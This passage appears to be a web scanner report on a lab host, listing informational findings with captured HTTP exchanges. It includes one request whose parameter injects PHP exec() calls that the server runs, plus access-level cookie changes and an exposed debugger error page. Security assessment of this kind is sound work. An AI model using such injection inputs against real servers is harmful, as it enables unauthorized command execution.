HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:48:29 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.9.10. http://10.250.200.5:81/search/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search/

Request 1

GET /search/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:49:07 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.9.11. http://10.250.200.5:81/search/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search/search

Request 1

GET /search/search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:49:07 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.9.12. http://10.250.200.5:81/sys2_test.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /sys2_test.php

Request 1

GET /sys2_test.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:13 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.9.13. http://10.250.200.5:81/sys2_test.php/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /sys2_test.php/

Request 1

GET /sys2_test.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.9.14. http://10.250.200.5:81/user/jyoti.ermine

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine

Request 1

GET /user/jyoti.ermine HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:10 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>jyoti.ermine -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.9.15. http://10.250.200.5:81/user/jyoti.ermine/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/

Request 1

GET /user/jyoti.ermine/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>jyoti.ermine -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.9.16. http://10.250.200.5:81/user/marge.aphrodite

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite

Request 1

GET /user/marge.aphrodite HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:06:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>marge.aphrodite -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<
...[SNIP]...
3.9.17. http://10.250.200.5:81/user/marge.aphrodite/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/

Request 1

GET /user/marge.aphrodite/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>marge.aphrodite -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<
...[SNIP]...
3.9.18. http://10.250.200.5:81/user/rica.orpah

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah

Request 1

GET /user/rica.orpah HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:14:38 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>rica.orpah -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.9.19. http://10.250.200.5:81/user/rica.orpah/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/

Request 1

GET /user/rica.orpah/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:20 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>rica.orpah -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.9.20. http://10.250.200.5:81/user/ricca.gilud

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud

Request 1

GET /user/ricca.gilud HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:22:14 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1339
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>ricca.gilud -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.9.21. http://10.250.200.5:81/user/ricca.gilud/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/

Request 1

GET /user/ricca.gilud/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1339
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>ricca.gilud -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.9.22. http://10.250.200.5:81/user/stephi.fonda

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda

Request 1

GET /user/stephi.fonda HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:31:55 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1399
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>stephi.fonda -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.9.23. http://10.250.200.5:81/user/stephi.fonda/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/

Request 1

GET /user/stephi.fonda/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:24:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>stephi.fonda -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.9.24. http://10.250.200.5:8080/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:8080
Path:   /

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
3.9.25. http://10.250.200.5:8080/admin-networking.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:8080
Path:   /admin-networking.html

Request 1

GET /admin-networking.html HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/admin-system.html
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6553
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:19 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
3.9.26. http://10.250.200.5:8080/admin-system.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:8080
Path:   /admin-system.html

Request 1

GET /admin-system.html HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:8080/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5039
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
3.9.27. http://10.250.200.5:8080/admin-users.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:8080
Path:   /admin-users.html

Request 1

GET /admin-users.html HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/admin-system.html
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5624
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:30 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
3.9.28. http://10.250.200.5:8080/login

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:8080
Path:   /login

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
X-XSS-Protection: 0
Connection: close
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:34 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>KeyError: 'userNone_username' // Werkzeug Debugger</title>
<link
...[SNIP]...
3.10. Browser cross-site scripting filter disabled

There are 43 instances of this issue:

Issue description

Some browsers, including Internet Explorer, contain built-in filters designed to protect against cross-site scripting (XSS) attacks. Applications can instruct browsers to disable this filter by setting the following response header:

X-XSS-Protection: 0

This behavior does not in itself constitute a vulnerability; in some cases XSS filters may themselves be leveraged to perform attacks against application users. However, in typical situations XSS filters do provide basic protection for application users against some XSS vulnerabilities in applications. The presence of this header should be reviewed to establish whether it affects the application's security posture.

Issue remediation

Review whether the application needs to disable XSS filters. In most cases you can gain the protection provided by XSS filters without the associated risks by using the following response header:

X-XSS-Protection: 1; mode=block

When this header is set, browsers that detect an XSS attack will simply render a blank page instead of attempting to sanitize the injected script. This behavior is considerably less likely to introduce new security issues.

3.10.1. http://10.250.200.5:81/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 8273
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.10.2. http://10.250.200.5:81/133_test.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /133_test.php

Request 1

GET /133_test.php?test=echo+%22Generated+by+%22+.+exec%28%22hostname%22%29+.+%22%3C%2Fbr%3E+at+%22+.+exec%28%22date%22%29%3B HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 62
Connection: close
Content-Type: text/html; charset=UTF-8

Generated by f88c475663fb</br> at Wed Nov 8 11:42:44 UTC 2017
3.10.3. http://10.250.200.5:81/config.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /config.php

Request 1

GET /config.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

3.10.4. http://10.250.200.5:81/config.php/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /config.php/

Request 1

GET /config.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

3.10.5. http://10.250.200.5:81/contactus.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /contactus.php

Request 1

GET /contactus.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

